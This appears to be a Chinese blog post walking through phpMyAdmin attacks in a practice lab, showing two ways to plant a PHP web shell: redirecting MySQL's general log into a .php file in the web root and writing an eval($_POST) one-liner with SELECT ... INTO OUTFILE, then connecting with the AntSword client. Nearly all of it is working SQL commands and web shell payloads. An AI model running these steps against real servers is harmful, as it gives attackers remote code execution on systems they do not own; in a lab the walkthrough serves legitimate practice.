PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
ZKNOW甄知科技13 分钟前
低代码 ITSM 知识管理平台:驱动企业数智化运维的新引擎
运维·服务器·人工智能·低代码·网络安全·自动化
白帽黑客-晨哥10 小时前
OWASP Top 10 2024 深度解析:Web安全新威胁与防御策略
安全·web安全·网络安全·漏洞挖掘·副业
独行soc10 小时前
2025年渗透测试面试题总结-275(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
码农12138号12 小时前
服务端请求伪造-SSRF 学习笔记
笔记·web安全·网络安全·ctf·ssrf·服务端请求伪造
今日上上签070714 小时前
山东大学软件学院信息安全导论2025往年回忆版
网络安全·信息安全·山东大学·软件学院·导论·往年题·回忆版
漏洞文库-Web安全15 小时前
AWD比赛随笔
开发语言·python·安全·web安全·网络安全·ctf·awd
小白勇闯网安圈15 小时前
file_include、easyphp、ics-05
网络安全·php·web
这儿有一堆花17 小时前
Windows 环境下 Nmap 的实战逻辑
windows·网络安全
Suckerbin18 小时前
BTRSys: v2.1靶场渗透
安全·web安全·网络安全
骥龙1 天前
3.11、终端安全最后一道屏障:EDR 原理与 Evil-WinRM 实战
网络·安全·网络安全